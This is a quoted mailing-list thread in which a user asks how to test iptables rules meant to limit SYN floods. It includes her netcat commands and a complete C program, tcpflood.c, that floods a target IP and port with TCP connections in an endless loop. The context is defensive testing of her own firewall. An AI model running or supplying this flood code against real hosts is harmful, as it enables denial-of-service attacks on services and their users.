Can anyone help?
Thanks again,
Peggy
Peggy Kam wrote:
Hi,
I tried to use netcat for generating flood and listening on one
machine,
ie. ./flood.sh attacked_machine_ip attacked_port 1000 |
/prod/netcat/bin nc -l -p 2222
And tried to do ./nc ip_address_of_the_above_machine 2222 -x -t
I have also set up the firewall as follows:
iptables -N SYN_FLOOD
iptables -i eth1 -A INPUT -p tcp --syn -j SYN_FLOOD
iptables -A SYN_FLOOD -m limit --limit 2/s --limit-burst 4 -j RETURN
iptables -A SYN_FLOOD -j DROP
iptables -A SYN_FLOOD -i eth1 -p tcp ! --syn -m state --state NEW -j
DROP
And I have been getting packets transfer between the 2 machines.
May I ask how I can debug the network using this tool netcat. I am not
familar with the raw socket stuff at all. Any help on this is
appreciated.
Thanks in advance,
Peggy
Daniel Chemko wrote:
Try using raw sockets and cook your own headers, or just use tools that
are designed for it, like netcat
Peggy Kam wrote:
Hi,
I have set up some rules for preventing the synflood attack, ie:
iptables -A SYN_FLOOD -m limit --limit 2/s --limit-burst 4 -j ACCEPT
iptables -A SYN_FLOOD -j DROP
iptables -A SYN_FLOOD -i eth1 -p tcp ! --syn -m state --state NEW -j
DROP
However, the firewall does not seem to filter any packets. I have
used
the following tcpflood.c program to generate the flood, however, when
I used tcpdump and checked the message log with the firewall with and
without the above rules, they gave me the same results. So, may I ask
how I can test the firewall for DoS attack?
Thanks in advance,
Peggy
#tcpflood.c
#include <unistd.h>
#include <stdio.h>
#include <netdb.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <sys/types.h>
int main(int argc, char **argv) {
struct sockaddr_in to_addr;
int s;
bzero(&to_addr, sizeof(to_addr));
to_addr.sin_family=AF_INET;
if ( argc == 3 ) {
to_addr.sin_addr.s_addr=inet_addr(argv[1]);
to_addr.sin_port=htons(atoi(argv[2]));
}
else {
fprintf(stderr, "Usage: %s <IP> <PORT>\n", argv[0]);
return 1;
}
printf("Flooding %s:%d ...\n", argv[1], atoi(argv[2]));
while (1) {
if ((s = socket(PF_INET, SOCK_STREAM, 0)) < 0) {
fprintf(stderr, "Error: socket()\n");
return 1;
}
if ((connect(s, (struct sockaddr *)&to_addr, sizeof to_addr))
< 0) { perror("connect()");
return 1;
}
printf(".");
fflush(stdout);
close(s);
}
return 0;
}
|